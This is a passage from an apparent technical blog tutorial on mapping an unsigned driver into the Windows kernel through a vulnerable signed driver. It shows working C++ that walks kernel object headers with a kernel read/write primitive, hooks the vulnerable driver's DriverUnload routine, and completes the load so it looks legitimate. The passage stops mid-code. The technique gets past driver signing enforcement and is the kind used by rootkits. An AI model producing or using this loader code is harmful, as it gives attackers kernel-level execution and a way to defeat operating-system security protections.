When we talk about vulnerable driver’s its usually vulnerable because they provide poorly implemented control code handlers. Usually driver writer’s only expect their driver to be called by their own software, so for example they may provide a control code which memcpys data around, but there may be a way for us to send an unexpected buffer format that allows us to control the pointers and size used by memcpy, in that case assuming they didn’t bounds check any pointers we’d be able to call that poorly implemented control code handler to both copy data out of and into kernel essentially giving us a kernel read/write primitive!

So why am I explaining all of this? Well, we want to patch a routine in the DRIVER_OBJECT structure of the vulnerable driver we loaded but we need to find it first. Given drivers need to register a device object to be communicated with from user-mode (which is how most vulnerable drivers are exploited) and I’m assuming you’re exploiting your vulnerable driver via DeviceIoControl, it then follows that your vulnerable driver will have a DEVICE_OBJECT structure in kernel somewhere too! So why does that matter? Well, it turns out that DEVICE_OBJECT structures are a little easier/more consistent to find than DRIVER_OBJECT structures and if you look at the definition of a DEVICE_OBJECT here, you’ll see that it handily has a pointer to the DRIVER_OBJECT structure of the driver that created the device!

Okay, so how do we go about finding the DEVICE_OBJECT?

It turns out that Windows stores all kernel objects in a tree like structure, you can browse the object tree using a useful tool like WinObj. Under the root object “\” we then have directories for various object types like driver and device objects. If there’s a folder pointing to all of the driver objects then why are we looking for the device object first? Again, going back to my assumption that you are exploiting your vulnerable driver by IOCTLs you needed to know the name of the symbolic link to call CreateFile to open a handle to the device for you to even send it an IOCTL in the first place! So given that you already know the name of the symbolic link, we can use a tool like WinObj to find out which device the symbolic link points to!

For example in this screenshot we can see that the symbolic link \.\Dfs is a symbolic link to the device \Device\DfsClient. The driver object name on the other hand, comes from the name of the service backing the driver which is subject to change. Service? Okay, so when you load a driver normally on Windows you create a service of type SERVICE_KERNEL_DRIVER and you set the service binary as the actual driver .sys file. The name of the service is then used as the name of the driver object that represents that driver. So if you registered the driver using a service of a different name, the name of the driver object you’re looking for would also change, this is another reason to prefer looking for the device object, which is registered by code in the driver that won’t change even if the name of the service does.

Okay, so we’ve decided to look for the device object pointed to by the symbolic link, say for example the device path is \Device\VulnerableDriver, how do we find the address of this kernel mode structure from user mode?

Crawling the Kernel Object Tree

Remember the kernel offset structure we defined right at the start? It had a member called rvaObpRootDirectoryObject, which is the RVA of the ntoskrnl.exe’s private symbol ObpRootDirectoryObject. The pointer stored at this address points us at the root directory object of the kernel object tree! Awesome! So how do we crawl it?

Well, first we need to talk a little bit about the Kernel Object Manager which owns the kernel object tree. The Windows Kernel Object Manager is the component is responsible for managing all of the resources in Windows. Objects are essentially data structures that represent system resources, the object manager however treats each object as an opaque data structure that it has been asked to provide, manage, and even guard, but not interpret. To perform its various responsibilities however, it needs to store some state about each opaque object it is responsible for. It does this by allocating some additional memory in front of the opaque object structure to store an OBJECT_HEADER. Everything that the object manager needs to know about the object for its object manager purposes is reached via this OBJECT_HEADER. The other side of the coin however is that the owner and users of the objects need not and should not interpret the OBJECT_HEADER. The result is that when an object is allocated by the object manager it returns the pointer to the opaque data blob, NOT a pointer to the OBJECT_HEADER. We however, need to walk the object tree, and to do this we need to access and inspect the object headers to figure out what kind of object we’re looking at!

It all starts then with the root directory object, the opaque data for this object type is an OBJECT_DIRECTORY structure and in this case, because we know its the root directory object, we didn’t have to go snooping around in the OBJECT_HEADER structure to figure that out. The OBJECT_DIRECTORY structure is an object type used by the object manager itself for representing a directory in the object namespace. It is simply a container of other objects, including more directory objects. Let’s take a quick look at the structure:

struct _OBJECT_DIRECTORY
{
    struct _OBJECT_DIRECTORY_ENTRY* HashBuckets[37];                        //0x0
    struct _EX_PUSH_LOCK Lock;                                              //0x128
    struct _DEVICE_MAP* DeviceMap;                                          //0x130
    struct _OBJECT_DIRECTORY* ShadowDirectory;                              //0x138
    VOID* NamespaceEntry;                                                   //0x140
    VOID* SessionObject;                                                    //0x148
    ULONG Flags;                                                            //0x150
    ULONG SessionId;                                                        //0x154
};

The OBJECT_DIRECTORY structure stores all of the child objects in hash buckets which are singly linked lists of the child objects. The benefit here is that instead of having one massively long list of child objects we have 37 shorter lists and a quick hashing algorithm to figure out which of the 37 shorter lists to place an object in. Obviously the hashing algorithm needs to have a fairly uniform distribution to ensure that all 37 lists grow fairly consistently but it brings with it a fairly sizeable performance increase. Now, we could try and figure out the hash function so we know which hash bucket to look in for the object we care about but its liable to change between Windows versions and the much more stable and simpler approach is to just search through all 37 hash buckets. Right, so what are we looking for? Well the first object we’re looking for is another directory object called ‘Device’ which holds all of the kernel device objects. Let’s just quickly take a look at the OBJECT_DIRECTORY_ENTRY responsible for the singly linked lists:

struct _OBJECT_DIRECTORY_ENTRY
{
    struct _OBJECT_DIRECTORY_ENTRY* ChainLink;                              //0x0
    VOID* Object;                                                           //0x8
    ULONG HashValue;                                                        //0x10
};

So we have a chain link to the next item in the singly linked list, a pointer to an object and then the computed hash value. So to walk the hash buckets we iterate over each hash bucket individually then for each OBJECT_DIRECTORY_ENTRY we inspect the object inside and then also walk the chain link until we find the end of the singly linked list (typically indicated by a null value for the ChainLink field). Now we finally hit our issue however, as now all we have is a bunch of opaque objects to inspect and we have no idea which ones are even directory objects, let alone what the name of each object is!!!

Snooping the OBJECT_HEADER

For each object pointer we encounter to figure out what we’re looking at we can start by stepping back by sizeof(OBJECT_HEADER) then inspecting the header which looks something like:

struct _OBJECT_HEADER
{
    LONGLONG PointerCount;                                                  //0x0
    union
    {
        LONGLONG HandleCount;                                               //0x8
        VOID* NextToFree;                                                   //0x8
    };
    struct _EX_PUSH_LOCK Lock;                                              //0x10
    UCHAR TypeIndex;                                                        //0x18
    union
    {
        UCHAR TraceFlags;                                                   //0x19
        struct
        {
            UCHAR DbgRefTrace : 1;                                            //0x19
            UCHAR DbgTracePermanent : 1;                                      //0x19
        };
    };
    UCHAR InfoMask;                                                         //0x1a
    union
    {
        UCHAR Flags;                                                        //0x1b
        struct
        {
            UCHAR NewObject : 1;                                              //0x1b
            UCHAR KernelObject : 1;                                           //0x1b
            UCHAR KernelOnlyAccess : 1;                                       //0x1b
            UCHAR ExclusiveObject : 1;                                        //0x1b
            UCHAR PermanentObject : 1;                                        //0x1b
            UCHAR DefaultSecurityQuota : 1;                                   //0x1b
            UCHAR SingleHandleEntry : 1;                                      //0x1b
            UCHAR DeletedInline : 1;                                          //0x1b
        };
    };
    ULONG Reserved;                                                         //0x1c
    union
    {
        struct _OBJECT_CREATE_INFORMATION* ObjectCreateInfo;                //0x20
        VOID* QuotaBlockCharged;                                            //0x20
    };
    VOID* SecurityDescriptor;                                               //0x28
    struct _QUAD Body;                                                      //0x30
};

As previously mentioned this contains or points to all of the information which the object manager needs to keep track of for this object. Now, given we’re looking for another directory object we can start eliminating candidate objects by inspecting the object type! So, how do we figure out what type of object this is? It all starts with the TypeIndex field. Historically, the TypeIndex field is an index into an array of pointers called the type index table where each pointer points to an OBJECT_TYPE structure:

struct _OBJECT_TYPE
{
    struct _LIST_ENTRY TypeList;                                            //0x0
    struct _UNICODE_STRING Name;                                            //0x10
    VOID* DefaultObject;                                                    //0x20
    UCHAR Index;                                                            //0x28
    ULONG TotalNumberOfObjects;                                             //0x2c
    ULONG TotalNumberOfHandles;                                             //0x30
    ULONG HighWaterNumberOfObjects;                                         //0x34
    ULONG HighWaterNumberOfHandles;                                         //0x38
    struct _OBJECT_TYPE_INITIALIZER TypeInfo;                               //0x40
    struct _EX_PUSH_LOCK TypeLock;                                          //0xb8
    ULONG Key;                                                              //0xc0
    struct _LIST_ENTRY CallbackList;                                        //0xc8
};

Which contains, among other things, the Name of the type! This leaves us with a few questions:

Where is this type index table?
Why did I use the phrase ‘historically’?

Let’s start with 1. Remember that kernel offsets structure again? It contained another member called rvaObTypeIndexTable which is the RVA into ntoskrnl.exe for the ObTypeIndexTable symbol, which, you guessed it, is the location of the pointer that points to the type index table!! Phew, that was an easy one! Okay, but why did I use the word ‘historically’? Well, the TypeIndex field used to contain the actual index into the array, but in Windows 10 that changed, its now an encoded index… Okay, so how do we decode the index? For that we can take a look at the function ObGetObjectType which is a kernel mode function thats looks up the type of an object, which is exactly what we’re trying to replicate in our user-mode driver loader. It turns out that in Windows 10 we need to:

Grab the memory address of the OBJECT_HEADER for the object we’re inspecting
XOR the value in the TypeIndex field with the second least significant byte of the address
XOR that result with the byte stored at the symbol ObHeaderCookie
We now have our type index!

So now the 3rd and final field in our kernel offsets structure comes into play, we also had a member called rvaObHeaderCookie which is the RVA into ntoskrnl.exe of the ObHeaderCookie symbol which contains the special byte we need for the XOR in step 3! The code for decoding an object type index looks something like this:

size_t ObGetObjectType(KernelPtr& ptr, void* objectAddress, const KernelOffsets& offsets)
{
    /*
        Use offset from hashmap to grab object header cookie
        
        Note, the KernelPtr object passed in this method is 'based' on NtosKrnl.exe's base address
        which we found from our KGetModuleHandle implementation we showed earlier. So 'setting' the
        KernelPtr to the RVA we have is simply adding the RVA to the base address of ntoskrnl.
        
        We can then dereference the byte at that address to get the ObHeader Cookie
    */
    BYTE ObHeaderCookie = *ptr.set(offsets.rvaObHeaderCookie);

    // Calculate the address of the OBJECT_HEADER structure, annoyingly the OBJECT_HEADER structure has a field member
    // for referring to the object body so we need to subtract that from the size of the object header structure
    void* pObjectHeaderAddress = reinterpret_cast<byte*>(objectAddress) - (sizeof(_OBJECT_HEADER) - sizeof(_OBJECT_HEADER::Body));

    // We also need to grab the OBJECT_HEADER from kernel so we can read the TypeIndex field
    _OBJECT_HEADER header = *ptr.set(pObjectHeaderAddress);

    // Finally we can calculate the real TypeIndex value
    return ObHeaderCookie ^ header.TypeIndex ^ ((reinterpret_cast<UINT_PTR>(pObjectHeaderAddress) & 0xFF00) >> 8);
}

At this point, for any given object we now know how to find the correct TypeIndex into the type index table, so now we need to go grab the name of the type!

std::wstring ObGetObjectTypeName(KernelPtr& ptr, size_t index, const KernelOffsets& offsets)
{
    // Grab the RVA of the type index table symbol
    DWORD rvaObTypeIndexTable = offsets.rvaObTypeIndexTable;
        
    // Add the index multiplied by the sizeof(void*) as we're indexing into an array of pointers
    DWORD rva = rvaObTypeIndexTable + static_cast<DWORD>(sizeof(void*) * index);
        
    // 'set' the KernelPtr object based on ntoskrnl's base address which is just adding this RVA to that base address
    // The dereference the KernelPtr object to read the pointer to the OBJECT_TYPE structure from kernel
    void* pObjectType = *ptr.set(rva);
        
    // Set the KernelPtr again to move it, this time because we're passing a void* and not a DWORD it just
    // moves to the absolute address pObjectType rather than adding it as an RVA
    _OBJECT_TYPE objectType = *ptr.set(pObjectType);
        
    // Again move our kernel pointer to the buffer pointed to by the name field in the OBJECT_TYPE structure
    // Then dereference it to read that string from kernel
    std::wstring typeName = *ptr.set(objectType.Name.Buffer);
    
    // Given that UNICODE_STRING structures aren't guaranteed to be null terminated we need to correctly
    // resize our string we read from kernel to chop off any unwanted data. (Our kernel string read just reads
    // until a null is found which means we may have read too much)
    typeName.resize(objectType.Name.Length / sizeof(wchar_t));
        
    // Finally we can return the type name we pulled from kernel
    return typeName;
}

Nice! So at this point when we encounter an object we can grab its type name, this means that given we’re looking for a directory object we can limit our search to objects that have a type name of "Directory”. Okay, but say that we find an object of type "Directory”, how do we know if its the "Device” directory object? Well, for that, we now need to figure out how to find an objects name. Let’s take another look at the OBJECT_HEADER:

struct _OBJECT_HEADER
{
    LONGLONG PointerCount;                                                  //0x0
    union
    {
        LONGLONG HandleCount;                                               //0x8
        VOID* NextToFree;                                                   //0x8
    };
    struct _EX_PUSH_LOCK Lock;                                              //0x10
    UCHAR TypeIndex;                                                        //0x18
    union
    {
        UCHAR TraceFlags;                                                   //0x19
        struct
        {
            UCHAR DbgRefTrace : 1;                                            //0x19
            UCHAR DbgTracePermanent : 1;                                      //0x19
        };
    };
    UCHAR InfoMask;                                                         //0x1a
    union
    {
        UCHAR Flags;                                                        //0x1b
        struct
        {
            UCHAR NewObject : 1;                                              //0x1b
            UCHAR KernelObject : 1;                                           //0x1b
            UCHAR KernelOnlyAccess : 1;                                       //0x1b
            UCHAR ExclusiveObject : 1;                                        //0x1b
            UCHAR PermanentObject : 1;                                        //0x1b
            UCHAR DefaultSecurityQuota : 1;                                   //0x1b
            UCHAR SingleHandleEntry : 1;                                      //0x1b
            UCHAR DeletedInline : 1;                                          //0x1b
        };
    };
    ULONG Reserved;                                                         //0x1c
    union
    {
        struct _OBJECT_CREATE_INFORMATION* ObjectCreateInfo;                //0x20
        VOID* QuotaBlockCharged;                                            //0x20
    };
    VOID* SecurityDescriptor;                                               //0x28
    struct _QUAD Body;                                                      //0x30
};

The field we’re interested in now, is the InfoMask field. Though an OBJECT_HEADER precedes every object the object manager has some additional optimizations. Some data is only required for certain objects, so the way this was done was by having additional structures preceding the OBJECT_HEADER if they are required, but we also need to know which structures precede the OBJECT_HEADER and the InfoMask field tells us which additional structures precede the OBJECT_HEADER! Its not enough however just to know which structures precede the OBJECT_HEADER, we also need to know what order they are in! The order of the structures it turns out is actually determined by the order of the bits in the InfoMask. Let’s start by just taking a quick look at what flags can be set in the InfoMask:

0x01    OBJECT_HEADER_CREATOR_INFO
0x02    OBJECT_HEADER_NAME_INFO 
0x04    OBJECT_HEADER_HANDLE_INFO
0x08    OBJECT_HEADER_QUOTA_INFO
0x10    OBJECT_HEADER_PROCESS_INFO
0x20    OBJECT_HEADER_AUDIT_INFO
0x40    OBJECT_HEADER_HANDLE_REVOCATION_INFO

We’re interested in the OBJECT_HEADER_NAME_INFO structure! So, first we need to check that the actual bit is set in the InfoMask, then we need to calculate the stepback to find the structure. Now, if the bit flag is also set for the OBJECT_HEADER_CREATOR_INFO structure then this will be the first structure preceding the OBJECT_HEADER so we’ll have to step back past this structure to the OBJECT_HEADER_NAME_INFO structure. If the bit isn’t set then the OBJECT_HEADER_NAME_INFO will be the first structure preceding the OBJECT_HEADER. I.e. the object memory layout would either be ...[OBJECT_HEADER_NAME_INFO][OBJECT_HEADER_CREATOR_INFO][OBJECT_HEADER]... if the OBJECT_HEADER_CREATOR_INFO flag is also set, or it would be just ...[OBJECT_HEADER_NAME_INFO][OBJECT_HEADER]... if only the OBJECT_HEADER_NAME_INFO is set. Lastly let’s take a look at the OBJECT_HEADER_NAME_INFO structure:

struct _OBJECT_HEADER_NAME_INFO
{
    struct _OBJECT_DIRECTORY* Directory;                                    //0x0
    struct _UNICODE_STRING Name;                                            //0x8
    LONG ReferenceCount;                                                    //0x18
    ULONG Reserved;                                                         //0x1c
};

Again, what we care about here is the Name field. Okay, now we’re ready to take a look at it all put together:

std::wstring ObGetObjectName(KernelPtr& ptr, void* objectAddress)
{
    std::wstring retval;
        
    // First grab the address of the OBJECT_HEADER by stepping back from the object pointer
    void* pObjectHeaderAddress = reinterpret_cast<byte*>(objectAddress) - (sizeof(_OBJECT_HEADER) - sizeof(_OBJECT_HEADER::Body));
        
    // Read the OBJECT_HEADER from kernel
    _OBJECT_HEADER header = *ptr.set(pObjectHeaderAddress);
        
    // Check to see if this object even has a name! Remember this isn't a mandatory structure for all objects
    if (header.InfoMask & FLAG_OBJECT_HEADER_NAME_INFO)
    {
        // This object has a name!
        
        // Calculate the stepback, remebering we have to step back over the _OBJECT_HEADER_CREATOR_INFO structure if the flag for it is set
        DWORD stepback = (header.InfoMask & FLAG_OBJECT_HEADER_CREATOR_INFO) ? sizeof(_OBJECT_HEADER_CREATOR_INFO) : 0;
        stepback += sizeof(_OBJECT_HEADER_NAME_INFO);
                
        // Move our KernelPtr to the calculated address and dereference it to read the _OBJECT_HEADER_NAME_INFO structure
        _OBJECT_HEADER_NAME_INFO nameInfo = *ptr.set(reinterpret_cast<byte*>(pObjectHeaderAddress) - stepback);
                
        // Read the wide string from kernel from the buffer pointed to by the name field
        std::wstring objName = *ptr.set(nameInfo.Name.Buffer);
        // Remember to resize it given that our kernel string read reads until a null byte but UNICODE_STRING strings aren't guaranteed to be null terminated
        objName.resize(nameInfo.Name.Length / sizeof(wchar_t));
        
        // Finally we can return the object name!
        retval = objName;
    }

    return retval;
}

Awesome! Now, given a pointer to an object, we can figure out both its name and its type! This is finally enough for us to walk the kernel object tree to find our device \Device\VulnerableDriver. From the root directory object we scan through all of the hash buckets until we find an object of type "Directory" with the name "Device" . Then again we crawl all of the hash buckets in the "Device" directory to look for an object of type "Device" with the name "VulnerableDriver"! Once we’ve finally found the object we’re looking for because we know its a "Device" object we know the structure pointer to by the object pointer is a DEVICE_OBJECT:

struct _DEVICE_OBJECT
{
    SHORT Type;                                                             //0x0
    USHORT Size;                                                            //0x2
    LONG ReferenceCount;                                                    //0x4
    struct _DRIVER_OBJECT* DriverObject;                                    //0x8
    struct _DEVICE_OBJECT* NextDevice;                                      //0x10
    struct _DEVICE_OBJECT* AttachedDevice;                                  //0x18
    struct _IRP* CurrentIrp;                                                //0x20
    struct _IO_TIMER* Timer;                                                //0x28
    ULONG Flags;                                                            //0x30
    ULONG Characteristics;                                                  //0x34
    struct _VPB* Vpb;                                                       //0x38
    VOID* DeviceExtension;                                                  //0x40
    ULONG DeviceType;                                                       //0x48
    CHAR StackSize;                                                         //0x4c
    union
    {
        struct _LIST_ENTRY ListEntry;                                       //0x50
        struct _WAIT_CONTEXT_BLOCK Wcb;                                     //0x50
    } Queue;                                                                //0x50
    ULONG AlignmentRequirement;                                             //0x98
    struct _KDEVICE_QUEUE DeviceQueue;                                      //0xa0
    struct _KDPC Dpc;                                                       //0xc8
    ULONG ActiveThreadCount;                                                //0x108
    VOID* SecurityDescriptor;                                               //0x110
    struct _KEVENT DeviceLock;                                              //0x118
    USHORT SectorSize;                                                      //0x130
    USHORT Spare1;                                                          //0x132
    struct _DEVOBJ_EXTENSION* DeviceObjectExtension;                        //0x138
    VOID* Reserved;                                                         //0x140
};

We can then finally follow the DriverObject pointer within this DEVICE_OBJECT structure et voila! We found the DRIVER_OBJECT structure for our vulnerable driver and we’re finally ready to patch in our hook to gain execution! Just for completeness, the DRIVER_OBJECT structure looks like this:

struct _DRIVER_OBJECT
{
    SHORT Type;                                                             //0x0
    SHORT Size;                                                             //0x2
    struct _DEVICE_OBJECT* DeviceObject;                                    //0x8
    ULONG Flags;                                                            //0x10
    VOID* DriverStart;                                                      //0x18
    ULONG DriverSize;                                                       //0x20
    VOID* DriverSection;                                                    //0x28
    struct _DRIVER_EXTENSION* DriverExtension;                              //0x30
    struct _UNICODE_STRING DriverName;                                      //0x38
    struct _UNICODE_STRING* HardwareDatabase;                               //0x48
    struct _FAST_IO_DISPATCH* FastIoDispatch;                               //0x50
    LONG(*DriverInit)(struct _DRIVER_OBJECT* arg1, struct _UNICODE_STRING* arg2); //0x58
    VOID(*DriverStartIo)(struct _DEVICE_OBJECT* arg1, struct _IRP* arg2);  //0x60
    VOID(*DriverUnload)(struct _DRIVER_OBJECT* arg1);                      //0x68
    LONG(*MajorFunction[28])(struct _DEVICE_OBJECT* arg1, struct _IRP* arg2); //0x70
};

Gaining Execution By Patching the Driver Object

Just to recap, we’ve now managed to:

Map our unsigned driver into kernel mode
Fixed up the mapped image’s relocations and imports
Found the DRIVER_OBJECT address for the unsigned driver’s driver object.

The last step now is to turn this into execution cleanly. For the sake of this blog I will assume your vulnerable driver has a DriverUnload routine and can be unloaded however if not, you can simply change your code to hook the MajorFunction entry for IRP_MJ_DEVICE_CONTROL and then send an IOCTL to it. Okay, so we’re hooking the driver unload, what do we do? Well, we need an address in kernel to transfer execution to and my personal preference is to have a function exported by your unsigned driver we just loaded. Why not point straight to the DriverEntry? Well, for one we need the function signature of the function we’re redirecting execution to, to match the function we hooked, but additionally we’ll trigger a call to our DriverEntry later when we finish loading our driver from within kernel. Let’s assume then that you have a function in your unsigned driver exported as AlternateDriverEntry with a function signature like so:

extern "C" void AlternateDriverEntry(DRIVER_OBJECT * DriverObject)

We can now actually re-use our KGetProcAddress implementation to find the address of this function exported by your unsigned driver. Now, we are about to finally patch out the vulnerable driver’s DriverUnload routine to point to AlternateDriverEntry, but we have one last issue, we need to tell our unsigned driver where the original routine is so that it can forward the call! The way I solved this was by using a driver data export (that again we can also find using our KGetProcAddress implementaion), and then we patch the original DriverUnload address into the data export:

extern "C" PDRIVER_UNLOAD Redirect = nullptr;

Finally our driver’s .def file should like something like:

EXPORTS
   AlternateDriverEntry
   Redirect

Okay, so we’ve patched the address of the original DriverUnload routine into the Redirect data export and we’ve modified the DRIVER_OBJECT so that the DriverUnload field now points to our exported function AlternateDriverEntry. Let’s trigger the execution!!

Wait, how do we trigger the driver unload? By stopping the service that represents the driver! So we make a call to ControlService to send the SERVICE_CONTROL_STOP code to stop the service backing our vulnerable driver and the DriverUnload routine will be executed! So what do we do now?

extern "C" void AlternateDriverEntry(DRIVER_OBJECT * DriverObject)
{
    /*
        Okay, so we've gained execution in kernel in the hooked DriverEntry but we
        need to forrward the call so that the vulnerable driver is allowed to unload.
        The easiest thing to do here is just create an additional thread to setup
        a call to our unsigned driver's DriverEntry routine like a normal driver would
        get.
    */
    HANDLE hThread;
    PsCreateSystemThread(&hThread, 0, NULL, NULL, NULL, SetupLegitDriverEntry, NULL);

    // Now that we have started a thread to run our own code let's forward to the original unload routine

    // Not sure this matters now but let's restore the original value anyway
    DriverObject->DriverUnload = Redirect;

    // Forward execution to the driver unload routine we hooked
    Redirect(DriverObject);
}

And there we have it!!!!! We finally have execution in kernel in our unsigned driver!!! As you can probably tell from the length of this blog however we’re sadly not done yet, we haven’t been properly loaded in the same way a legitimate driver would have been and we want to get as close to that as possible, so let’s use our kernel execution to try and setup a legitimate call to our unsigned driver’s DriverEntry routine! I promise you we are incredibly close!!

Sadly it turns out we need some additional private symbols to finish the load in kernel, so again we’ll resort to the same setup we used in user-mode of hashing ntoskrnl.exe and then using that hash to lookup a structure in our offset table. Now, you’d think hashing a file in kernel is difficult but all of the BCrypt APIs are actually available in kernel from cng.sys! So just add cng.lib to your driver’s linker settings and we can hash a file in kernel as follows:

...
UNICODE_STRING kernelPath = RTL_CONSTANT_STRING(L"\\??\\C:\\Windows\\System32\\ntoskrnl.exe");
UNICODE_STRING hash = HashFile(kernelPath);
...

UNICODE_STRING HashFile(UNICODE_STRING& path)
{
    UNICODE_STRING retval{};

    BCRYPT_ALG_HANDLE hAlg = NULL;

    NTSTATUS status = BCryptOpenAlgorithmProvider(&hAlg, BCRYPT_SHA256_ALGORITHM, NULL, 0);

    if (STATUS_SUCCESS == status)
    {
        DWORD32 objLength = 0;
        ULONG bytesWritten = 0;

        status = BCryptGetProperty(hAlg, BCRYPT_OBJECT_LENGTH, reinterpret_cast<PUCHAR>(&objLength), sizeof(objLength), &bytesWritten, 0);

        if (STATUS_SUCCESS == status && bytesWritten == sizeof(objLength) && 0 != objLength)
        {
            void* pFileBuffer = malloc(1'000'000);
            void* pHashBuffer = malloc(objLength);

            if (nullptr != pFileBuffer && nullptr != pHashBuffer)
            {
                DWORD32 hashLength = 0;
                bytesWritten = 0;

                status = BCryptGetProperty(hAlg, BCRYPT_HASH_LENGTH, reinterpret_cast<PUCHAR>(&hashLength), sizeof(hashLength), &bytesWritten, 0);

                if (STATUS_SUCCESS == status && bytesWritten == sizeof(hashLength) && 0 != hashLength)
                {
                    void* pHash = malloc(hashLength);

                    if (nullptr != pHash)
                    {
                        BCRYPT_HASH_HANDLE hHash = NULL;

                        status = BCryptCreateHash(hAlg, &hHash, reinterpret_cast<PUCHAR>(pHashBuffer), objLength, NULL, 0, 0);

                        if (STATUS_SUCCESS == status && NULL != hHash)
                        {

                            HANDLE hFile{};
                            OBJECT_ATTRIBUTES objAttrs{};
                            InitializeObjectAttributes(&objAttrs, &path, OBJ_CASE_INSENSITIVE, NULL, NULL);

                            IO_STATUS_BLOCK ioStatusBlock{};

                            status = ZwOpenFile(&hFile, GENERIC_READ, &objAttrs, &ioStatusBlock, FILE_SHARE_READ, FILE_SYNCHRONOUS_IO_NONALERT);

                            if (STATUS_SUCCESS == status && NULL != hFile)
                            {
                                status = ZwReadFile(hFile, NULL, NULL, NULL, &ioStatusBlock, pFileBuffer, 1'000'000, NULL, NULL);

                                size_t bytesRead = ioStatusBlock.Information;

                                while (bytesRead != 0 && STATUS_SUCCESS == status)
                                {
                                    // Hash data
                                    status = BCryptHashData(hHash, reinterpret_cast<PUCHAR>(pFileBuffer), static_cast<ULONG>(bytesRead), 0);

                                    // Get next chunk
                                    status = ZwReadFile(hFile, NULL, NULL, NULL, &ioStatusBlock, pFileBuffer, 1'000'000, NULL, NULL);
                                    bytesRead = ioStatusBlock.Information;
                                }

                                if (STATUS_END_OF_FILE == status)
                                {
                                    // Successfully hashed all chunks
                                    status = BCryptFinishHash(hHash, reinterpret_cast<PUCHAR>(pHash), hashLength, 0);

                                    if (STATUS_SUCCESS == status)
                                    {
                                        retval = Binary2Hex(pHash, hashLength);
                                    }
                                }
                                else
                                {
                                    DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, "Failed a read: %d", status);
                                }
                            }
                            else
                            {
                                DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, "Failed to open file");
                            }

                            BCryptDestroyHash(hHash);
                        }
                        else
                        {
                            DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, "Failed to create hash object");
                        }

                        free(pHash);
                    }
                    else
                    {
                        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, "Failed hash allocate");
                    }
                }
            }
            else
            {
                DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, "Failed allocate");
            }

            if (pFileBuffer != nullptr)
            {
                free(pFileBuffer);
            }
            if (pHashBuffer != nullptr)
            {
                free(pHashBuffer);
            }
        }
        else
        {
            DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, "Failed to get property");
        }

        BCryptCloseAlgorithmProvider(hAlg, 0);
    }
    else
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, "Failed to open algorithm provider");
    }

    return retval;
}

You’ll notice a few oddities in the code above:

We use malloc and free which don’t exist in the kernel
The function Binary2Hex also doesn’t exist

In response to 1. I’ve actually written my own CRT-like & STL-like functions and classes as a kernel mode driver library so if you’d like to see a blog post about that then please let me know but for now here’s the implementations of malloc and free:

// We default to allocating memory for people from the PAGED pool but allow them to override it
void* __cdecl malloc(size_t const size, POOL_FLAGS flags = POOL_FLAG_PAGED);

void* __cdecl malloc(size_t const size, POOL_FLAGS flags)
{
    void* block = ExAllocatePool2(flags, size, 'xxxx');

    return block;
}

void __cdecl free(void* const block)
{
    if (nullptr != block)
    {
        ExFreePool(block);
    }
}

In response to 2. I manually implemented the conversion of binary data to hex:

UNICODE_STRING Binary2Hex(void* data, size_t len)
{
    UNICODE_STRING retval{};

    // 2 wchars for each byte of data and 2 bytes for each wchar hence * 2 * 2
    // Then + 2 for null term
    size_t shaStringBytes = (len * 2 * 2) + 2;

    // Allocate result buffer with a null term
    wchar_t* pResult = reinterpret_cast<wchar_t*>(malloc(shaStringBytes));

    if (nullptr != pResult)
    {
        static wchar_t syms[] = L"0123456789abcdef";

        UCHAR* pBinaryData = reinterpret_cast<UCHAR*>(data);

        for (int i = 0; i < len; i++)
        {
            pResult[2 * i] = syms[(pBinaryData[i] >> 4) & 0xF];
            pResult[2 * i + 1] = syms[pBinaryData[i] & 0xF];
        }

        retval.Buffer = pResult;
        retval.MaximumLength = static_cast<USHORT>(shaStringBytes);
        retval.Length = static_cast<USHORT>(shaStringBytes - 2);
    }

    return retval;
}

So now that we can hash ntoskrnl, how can we do a lookup to find our offset structure for this hash? Now, jumping back to my custom STL-like implementations I’ve implemented for kernel, it does actually include a primitive version of a map, so again if you want to see that let me know, but for now let’s use this:

KernelOffset LookupKernel(UNICODE_STRING hash)
{
    KernelOffset retval{};

    for (int i = 0; i < __countof(_KernelOffsets); i++)
    {
        if (0 == _wcsicmp(hash.Buffer, _KernelOffsets[i].kernelSha256))
        {
            retval = _KernelOffsets[i].offsets;
            break;
        }
    }

    return retval;
}

Where:

struct KernelOffsetMap
{
    wchar_t kernelSha256[65];
    KernelOffset offsets;
};

constexpr KernelOffsetMap _KernelOffsets[] =
{
    {
        .kernelSha256 = L"5788ef18e2cdbc8bdddf1ddfaf2975652df18c469e11db0d51c98970e6c4636e",
        .offsets =
        {
            ...
        }
    },

The constexpr is key here because in kernel there is no CRT to initialize all of the globals (unless you implement a kernel CRT 😉) but having it declared constexpr means that the global can be evaluated and populated at compile time, meaning that in the built version of the driver that data is already there and no initialization is required for the array. Okay, so what private symbols do we need for kernel? It turns out only a few!

struct KernelOffset
{
    // Called RtlInsertInvertedFunctionTable in the ntoskrnl.exe symbols
    DWORD32 rvaRtlInsertInvertedFunctionTable;
    
    /*
        Unnamed in symbols, referenced by function MiLookupDataTableEntry.
        Look for reference to data section after call to ExAcquireResourceSharedLite
    */
    DWORD32 rvaAvlTreeRoot;
};

We need the RVA in ntoskrnl for the function RtlInsertInvertedFunctionTable. Actually, this step is only required if your driver wants to make use of SEH exceptions, however I’m including this for completeness. We also need an RVA for the pointer to an AvlTreeRoot, this is the root of an avl tree which contains nodes representing all of the modules loaded in kernel, this tree is used in some Windows APIs to verify the integrity of an address e.g. in the PsSetCreateProcessNotifyRoutine* functions, Windows checks that the provided callback falls within a loaded kernel module. This is to avoid both shellcode, or unloaded/unlinked drivers from receiving callbacks. Okay, so we have our two private symbols, let’s get to work!

First we’ll deal with registering our unsigned driver’s exception data to enable SEH exceptions:

// Grab a pointer to ntoskrnl's base address
void* pNtosBase = get_module_address("ntoskrnl.exe");   

// Calculate location of RtlInsertInvertedFunctionTable from offsets structure
fnRtlInsertInvertedFunctionTable pfnRtlInsertInvertedFunctionTable = reinterpret_cast<fnRtlInsertInvertedFunctionTable>(reinterpret_cast<char*>(pNtosBase) + _KernelOffsets.rvaRtlInsertInvertedFunctionTable);

// Grab our image size
